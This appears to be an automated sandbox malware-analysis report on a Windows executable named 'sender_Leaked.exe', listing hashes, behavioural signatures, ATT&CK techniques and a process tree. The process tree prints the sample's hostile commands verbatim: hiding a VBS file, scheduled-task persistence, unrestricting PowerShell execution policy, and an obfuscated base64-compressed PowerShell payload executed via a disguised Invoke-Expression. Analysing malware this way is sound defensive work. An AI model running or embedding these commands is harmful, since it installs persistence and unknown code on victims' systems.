Analysis
-
max time kernel
141s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-11-2024 13:13
Static task
static1
Behavioral task
behavioral1
Sample
sender_Leaked.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sender_Leaked.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
sender.pyc
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
sender.pyc
Resource
win10v2004-20241007-en
General
-
Target
sender_Leaked.exe
-
Size
10.4MB
-
MD5
ec24824b426d96f1137c664f23309a97
-
SHA1
0eb8f4d89dc4ac3824d0ce3a4d872c2ab0d52b38
-
SHA256
bd129bf2a26437a068b7486b46ca77d6f45786ac9f400c94678c0fdd15759a42
-
SHA512
14a2701c7551232da3c1d5d9cb18cf76f6aed52e046b6fd5aed9fd65bfa9058090a95331265f550d677b1c9947194f4b2e035ee2a8c9d7faa7d4b109e6c15738
-
SSDEEP
196608:XHdqeGkP/DnwZsupqDA1jV19v7+dPB68K1T59Y8pC/Uhh6ipc+46h:NFrn8sOqkFV1B+JB6F59bpP7xc+ph
Malware Config
Signatures
-
Loads dropped DLL 37 IoCs
Processes:
sender_Leaked.exepid Process 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe 2712 sender_Leaked.exe -
Processes:
powershell.exepowershell.exepid Process 1656 powershell.exe 1788 powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ifconfig.me 3 ifconfig.me -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule behavioral1/files/0x000500000001a074-94.dat upx behavioral1/memory/2712-105-0x000007FEF59C0000-0x000007FEF5E02000-memory.dmp upx behavioral1/files/0x000600000001757f-124.dat upx behavioral1/memory/2712-129-0x000007FEF6740000-0x000007FEF6764000-memory.dmp upx behavioral1/files/0x0005000000019d8c-130.dat upx behavioral1/memory/2712-132-0x000007FEF6730000-0x000007FEF673F000-memory.dmp upx behavioral1/files/0x00060000000174a6-131.dat upx behavioral1/memory/2712-135-0x000007FEF6710000-0x000007FEF672B000-memory.dmp upx behavioral1/files/0x0005000000018697-134.dat upx behavioral1/memory/2712-137-0x000007FEF62E0000-0x000007FEF6324000-memory.dmp upx behavioral1/files/0x0006000000018c44-138.dat upx behavioral1/memory/2712-140-0x000007FEF62C0000-0x000007FEF62D9000-memory.dmp upx behavioral1/files/0x000500000001a32f-141.dat upx behavioral1/files/0x0005000000019cbe-146.dat upx behavioral1/files/0x0006000000018f65-145.dat upx behavioral1/memory/2712-144-0x000007FEF6700000-0x000007FEF670D000-memory.dmp upx behavioral1/files/0x0005000000019f58-150.dat upx behavioral1/memory/2712-155-0x000007FEF5650000-0x000007FEF59B9000-memory.dmp upx behavioral1/memory/2712-154-0x000007FEF61C0000-0x000007FEF6275000-memory.dmp upx behavioral1/files/0x0006000000018c34-156.dat upx behavioral1/memory/2712-153-0x000007FEF6290000-0x000007FEF62B6000-memory.dmp upx behavioral1/memory/2712-163-0x000007FEF5480000-0x000007FEF54C7000-memory.dmp upx behavioral1/memory/2712-162-0x000007FEF6740000-0x000007FEF6764000-memory.dmp upx behavioral1/memory/2712-161-0x000007FEF59C0000-0x000007FEF5E02000-memory.dmp upx behavioral1/memory/2712-160-0x000007FEF61A0000-0x000007FEF61B0000-memory.dmp upx behavioral1/memory/2712-159-0x000007FEF61B0000-0x000007FEF61BD000-memory.dmp upx behavioral1/memory/2712-164-0x000007FEF5360000-0x000007FEF5472000-memory.dmp upx behavioral1/memory/2712-158-0x000007FEF5570000-0x000007FEF5646000-memory.dmp upx behavioral1/memory/2712-174-0x000007FEF62E0000-0x000007FEF6324000-memory.dmp upx behavioral1/memory/2712-180-0x000007FEF62C0000-0x000007FEF62D9000-memory.dmp upx behavioral1/memory/2712-181-0x000007FEF6290000-0x000007FEF62B6000-memory.dmp upx behavioral1/memory/2712-182-0x000007FEF61C0000-0x000007FEF6275000-memory.dmp upx behavioral1/memory/2712-183-0x000007FEF5650000-0x000007FEF59B9000-memory.dmp upx behavioral1/memory/2712-184-0x000007FEF5570000-0x000007FEF5646000-memory.dmp upx behavioral1/memory/2712-187-0x000007FEF59C0000-0x000007FEF5E02000-memory.dmp upx behavioral1/memory/2712-201-0x000007FEF5360000-0x000007FEF5472000-memory.dmp upx behavioral1/memory/2712-200-0x000007FEF5480000-0x000007FEF54C7000-memory.dmp upx behavioral1/memory/2712-190-0x000007FEF6710000-0x000007FEF672B000-memory.dmp upx behavioral1/memory/2712-188-0x000007FEF6740000-0x000007FEF6764000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.execsc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid Process 1788 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid Process 1656 powershell.exe 1788 powershell.exe 1656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
sender_Leaked.exesender_Leaked.execmd.execmd.execmd.execmd.exepowershell.exedescription pid Process procid_target PID 2236 wrote to memory of 2712 2236 sender_Leaked.exe 29 PID 2236 wrote to memory of 2712 2236 sender_Leaked.exe 29 PID 2236 wrote to memory of 2712 2236 sender_Leaked.exe 29 PID 2712 wrote to memory of 1520 2712 sender_Leaked.exe 30 PID 2712 wrote to memory of 1520 2712 sender_Leaked.exe 30 PID 2712 wrote to memory of 1520 2712 sender_Leaked.exe 30 PID 2712 wrote to memory of 1192 2712 sender_Leaked.exe 31 PID 2712 wrote to memory of 1192 2712 sender_Leaked.exe 31 PID 2712 wrote to memory of 1192 2712 sender_Leaked.exe 31 PID 1192 wrote to memory of 1632 1192 cmd.exe 32 PID 1192 wrote to memory of 1632 1192 cmd.exe 32 PID 1192 wrote to memory of 1632 1192 cmd.exe 32 PID 2712 wrote to memory of 2248 2712 sender_Leaked.exe 33 PID 2712 wrote to memory of 2248 2712 sender_Leaked.exe 33 PID 2712 wrote to memory of 2248 2712 sender_Leaked.exe 33 PID 2248 wrote to memory of 1676 2248 cmd.exe 34 PID 2248 wrote to memory of 1676 2248 cmd.exe 34 PID 2248 wrote to memory of 1676 2248 cmd.exe 34 PID 2712 wrote to memory of 2040 2712 sender_Leaked.exe 35 PID 2712 wrote to memory of 2040 2712 sender_Leaked.exe 35 PID 2712 wrote to memory of 2040 2712 sender_Leaked.exe 35 PID 2712 wrote to memory of 1856 2712 sender_Leaked.exe 36 PID 2712 wrote to memory of 1856 2712 sender_Leaked.exe 36 PID 2712 wrote to memory of 1856 2712 sender_Leaked.exe 36 PID 2040 wrote to memory of 1652 2040 cmd.exe 37 PID 2040 wrote to memory of 1652 2040 cmd.exe 37 PID 2040 wrote to memory of 1652 2040 cmd.exe 37 PID 2040 wrote to memory of 1656 2040 cmd.exe 38 PID 2040 wrote to memory of 1656 2040 cmd.exe 38 PID 2040 wrote to memory of 1656 2040 cmd.exe 38 PID 1856 wrote to memory of 1788 1856 cmd.exe 39 PID 1856 wrote to memory of 1788 1856 cmd.exe 39 PID 1856 wrote to memory of 1788 1856 cmd.exe 39 PID 1856 wrote to memory of 1788 1856 cmd.exe 39 PID 1788 wrote to memory of 2796 1788 powershell.exe 40 PID 1788 wrote to memory of 2796 1788 powershell.exe 40 PID 1788 wrote to memory of 2796 1788 powershell.exe 40 PID 1788 wrote to memory of 2796 1788 powershell.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\sender_Leaked.exe"C:\Users\Admin\AppData\Local\Temp\sender_Leaked.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\sender_Leaked.exe"C:\Users\Admin\AppData\Local\Temp\sender_Leaked.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:1520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"4⤵
- Views/modifies file attributes
PID:1632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"3⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"3⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\cmd.execmd /C echo Y4⤵PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')""3⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "( NEW-oBjEct sYSteM.IO.ComPreSsioN.deFLATEsTREAm([SysTEM.iO.MeMORystREAm] [cONVERT]::fRoMBAsE64stRINg( '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') ,[iO.CoMprEssiOn.CoMpREssIoNMoDe]::dEComPresS)|FoReACH-ObjeCT{ NEW-oBjEct Io.sTReAmrEADEr( $_ , [SYsTeM.TEXT.eNcOdInG]::ASCII )}| ForEacH-objeCt {$_.ReadtoEnd( ) }) |. ( $PshOme[21]+$PsHOmE[34]+'x')"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ucyhs5l0.cmdline"5⤵
- System Location Discovery: System Language Discovery
PID:2796
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87KB
MD50e675d4a7a5b7ccd69013386793f68eb
SHA16e5821ddd8fea6681bda4448816f39984a33596b
SHA256bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1
SHA512cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66
-
Filesize
45KB
MD571c208605d9d1a1b822ed14e40bde272
SHA1d605b1891c2b9360344f878f7aeae90a95e1425b
SHA25623330e593f5323caae5f992051d47d0e5b5c27c7b55c13b1e1f8869d0497725c
SHA512410c1e009b2c65c4c42c4d926a5fe9a4a4a0744872a4497ad0bb20c40897264124bd653490cba5214a6bfdb8b5ab3681d7c796e2ffe63107da3ba65194381e09
-
Filesize
55KB
MD5216682f01cb4fd3fbf5d31674f5ff9cf
SHA14b24fc944e6998280098ca207e0ea33e52767996
SHA2568dbef8fd9ce588db70b9f35b408d361f5d0cece4cb9a9edfeb75f9532a0ea92d
SHA512c97d96807bd8fffb55dd031482e926d0ef8923f4520083aec03bdd36d249d61e7cacde99fa7981f453408941cbec609e228f19487c780855b1add2a72fc00a98
-
Filesize
81KB
MD5c0af87822386bd3a1d44cab21c644866
SHA1f19ce82573538a46cd150841d7b1d1adad7c0d43
SHA2561f81f40a76ada929a590f56ffaa16c5d610fd65f89213858837ecc9b0f1952f4
SHA51251d0b819e0d79628af6f028306ae8730b640c04bc4087d9611fbbd6d5c3b6cdc56f2357813a01168e01afe0f0b3402fa151ba009f5af3f5696735adc41a3b6db
-
Filesize
21KB
MD59cb23d7372b166013adde2f53ba7a112
SHA189efeb10324b8a8a0e2d763a7087b515d2368122
SHA256376584e748ce83446160b0315bb85bed33b31ac6e25e573fa22e56c1cf96e82a
SHA512dcff6cc1b8b6240b9ab6ebc02ab9b085bc2a532d2c37b002e17dbbdee0a3d66f5e12c8b5dc4168fdf53dafc648152ddfcd52e0cce2c04cbf8ef9db4d601d29ac
-
Filesize
39KB
MD550e71ec18045021bc098b2b0aed1813b
SHA1804685545b2633cb36d8cea8d6b0604d45da531d
SHA256d3a48b335b62b37d467e4d36e514101bd9215f66356cb16ecf750ee78cc2d323
SHA512cec2589a1d836be599aa1ba5c33b88feb3a805d42658cbb631fba810948f85c34382a223ac26a72b7eaf0f1d30ba2e368c3d2e4ae7ff32f25fc1d6e739f24310
-
Filesize
20KB
MD52e8995e2320e313545c3ddb5c71dc232
SHA145d079a704bec060a15f8eba3eab22ac5cf756c6
SHA256c55eb043454ac2d460f86ea26f934ecb16bdb1d05294c168193a05090bf1c56c
SHA51219adcc5dd98f30b4eebefe344e1939c93c284c802043ea3ac22654cf2e23692f868a00a482c9be1b1e88089a5031fa81a3f1165175224309828bd28ee12f2d49
-
Filesize
22KB
MD554d2f426bc91ecf321908d133b069b20
SHA178892ea2873091f016daa87d2c0070b6c917131f
SHA256646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641
SHA5126b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06
-
Filesize
20KB
MD536165a5050672b7b0e04cb1f3d7b1b8f
SHA1ef17c4622f41ef217a16078e8135acd4e2cf9443
SHA256d7ab47157bff1b2347e7ae945517b4fc256425939ba7b6288ff85a51931568a7
SHA512da360ff716bb66dd1adb5d86866b4b81b08a6fe86362fded05430f833a96934ccdada1b3081b55766a4a30c16d0d62aa1715b8839ea5c405a40d9911715dae68
-
Filesize
21KB
MD575e626c3ebf160ebe75c59d3d6ac3739
SHA102a99199f160020b1086cec6c6a2983908641b65
SHA256762ca8dd14f8ff603d06811ba904c973a684022202476bca45e9dc1345151ac4
SHA5125ad205b90ac1658c5b07f6f212a82be8792999b68f9c9617a1298b04d83e7fcb9887ed307a9d31517bcba703b3ee6699ea93f67b06629355ea6519fed0a6d29a
-
Filesize
24KB
MD50485c463cd8d2ae1cbd42df6f0591246
SHA1ea634140905078e8f687a031ae919cff23c27e6f
SHA256983f4d4c7b7330e7f5f091080c1e81905575ebccd97e11dff8a064979ec8d9b8
SHA512ddf947a1b86c3826859570a3e1d59e4ec4564cfcf25c84841383a4b5f5ad6c2fe618078416aed201fb744d5fbd6c39dab7c1e964dd5e148da018a825fcc0044a
-
Filesize
21KB
MD5a22f9a4cbd701209842b204895fedf37
SHA172fa50160baf1f2ea2adcff58f3f90a77a59d949
SHA2562ee3d52640d84ac4f7f7ddfe748f51baa6fd0d492286c781251222420e85ca97
SHA512903755d4fa6651669295a10e66be8ea223cd8d5ad60ebe06188d8b779fef7e964d0aa26dc5479f14aab655562d3c1ef76b86790fb97f991eaf52da0f70e40529
-
Filesize
20KB
MD5ba17b278fff2c18e34e47562ddde8166
SHA1bed762d11b98737fcf1d1713d77345ec4780a8c2
SHA256c36f5c0ac5d91a8417866dd4d8c670c2192ba83364693e7438282fb8678c3d1e
SHA51272516b81606ccf836549c053325368e93264fdebc7092e42e3df849a16ccefa81b7156ae5609e227faa7c9c1bf9d68b2ac349791a839f4575728f350dd048f27
-
Filesize
28KB
MD5c4cac2d609bb5e0da9017ebb535634ce
SHA151a264ce4545a2f0d9f2908771e01e001b4e763e
SHA2567c3336c3a50bf3b4c5492c0d085519c040878243e9f7d3ea9f6a2e35c8f1f374
